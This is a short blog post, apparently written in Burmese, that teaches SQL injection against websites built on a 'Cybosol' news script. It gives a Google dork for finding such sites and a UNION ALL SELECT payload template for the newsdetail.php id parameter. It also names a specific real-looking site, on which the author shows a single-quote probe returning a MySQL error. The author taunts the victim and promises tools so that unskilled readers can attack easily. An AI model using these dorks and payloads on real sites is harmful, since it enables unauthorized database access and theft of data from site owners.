Google Dork: Intext:"Powered By Cybosol."နမူနာပုံစံကေတာ့ target/newsdetail.php?id=[id][+union+all+select+1,2,3,4,5,6,7,8,9--] ျဖစ္ပါတယ္..အစမ္းသေဘာျပေပးပ့ါမယ္။ ေအာက္ကလင့္ကိုသြားလုိက္ပါ..http://www.ufs.com.sa/newsdetail.php?id=69အေကာင္းတုိင္းေလးပါဘဲ လုိ ့ေတာ့မေျပာပါနဲ ့ေနာ္ ေဘာ္ဒါတုိ ့။ ' ေလးထပ္ထည့္ၾကည့္ပါhttp://www.ufs.com.sa/newsdetail.php?id=69' ျပီးရင္ သြားၾကည့္လုိက္ပါ..1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY news_pub_date DESC' at line 1
တဲ့မိျပီမေျပးနဲ ့ကြ injection ထုိးတတ္တဲ့သူေတြကေတာ့ထုိးေပ့ါ မထုိးတတ္တဲ့သူေတြအတြက္ ကြ်န္ေတာ္ အလြယ္တကူထုိးလုိ ့၇ေအာင္ tool ေလးေတြတင္ေပးပါအုံးမယ္..
No comments:
Post a Comment